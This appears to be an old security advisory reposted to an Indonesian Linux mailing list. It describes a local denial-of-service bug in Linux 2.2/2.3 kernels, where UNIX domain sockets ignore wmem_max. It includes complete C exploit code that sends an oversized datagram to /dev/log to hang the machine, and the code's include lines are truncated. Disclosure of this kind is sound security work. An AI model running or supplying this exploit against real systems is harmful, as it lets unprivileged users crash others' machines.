Local Denial of Service attack against Linux (/dev/log & socket)
----------------------------------------------------------------------------
----
SUMMARY
A new locally exploitable DoS attack has been discovered against Linux.
This DoS does not require any special privileges, and will hang the latest
Linux kernels.
DETAILS
Vulnerable systems:
Linux 2.2.12
Linux 2.2.14
Linux 2.3.99-pre2
The following exploit code will hang any Linux machine on various Pentium
platforms. Note that this does not require any special privileges, and any
user can compile and run it.
The send system call immediately puts the kernel in a loop spewing
kmalloc: Size (131076) too large forever (or until you hit the reset
button).
Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter, despite the documentation to the
contrary.
Exploit:
#include
#include
#include
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data)
);
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
return 0;
}
----
Bingung yah, kernel yang baruan justru malah ber bug ;)
-------
AFLHI 058009990407128029/089802---(102598//991024)
--------------------------------------------------------------------------
Utk berhenti langganan, kirim email ke [EMAIL PROTECTED]
Informasi arsip di http://www.linux.or.id/milis.php3
Pengelola dapat dihubungi lewat [EMAIL PROTECTED]
